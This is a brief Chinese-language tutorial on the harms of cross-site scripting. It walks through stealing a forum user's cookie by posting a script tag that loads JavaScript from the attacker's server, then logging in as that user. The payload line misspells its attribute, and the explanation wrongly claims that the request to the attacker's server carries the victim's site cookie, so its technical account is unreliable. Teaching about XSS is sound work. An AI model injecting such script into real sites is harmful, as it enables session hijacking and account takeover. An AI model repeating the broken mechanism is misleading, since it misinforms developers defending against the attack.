本文详细讲解XSS主要危害及其原理。
一 说明
XSS攻击最终发生在用户的浏览器上,攻击者利用XSS漏洞可执行任意的JavaScript脚本,所以JavaScript脚本能做的操作攻击者都可以做。
主要的危害有如下:
1)窃取Cookie,盗用sessionid等敏感信息,进而仿冒合法用户的身份进行操作,导致用户数据泄露、被篡改等;如果用户属于管理员等高权限用户,就有可能对整个系统产品危害;
2)篡改网站页面,显示非法信息;
3)重定向页面到钓鱼网站;
4)对其他网站进行DDoS攻击。
二 窃取Cookie,盗用sessionid等敏感信息的方法
窃取Cookie,盗用sessionid等敏感信息,进而仿冒合法用户的身份进行操作,导致用户数据泄露、被篡改等;如果用户属于管理员等高权限用户,就有可能对整个系统产品危害。
2.1 窃取cookie的方法
1)A攻击者在S论坛网站的留言板区域输入<script scr=”js_url”></script>,这里的js_url是A自己的电脑启动的一个服务器上边资源;
2)B是一个S论坛用户,S访问到浏览板块时,B的浏览器就会加载上边的脚本,向A的服务器请求js资源,注意,这个请求会携带cookie等信息;
3)A这时就能拿到B的cookie等重要信息,在通过一些其它小工具,就能不输入账号密码,通过B用户的身份进行登录S网站了,这时候就可以肆意进行操作了。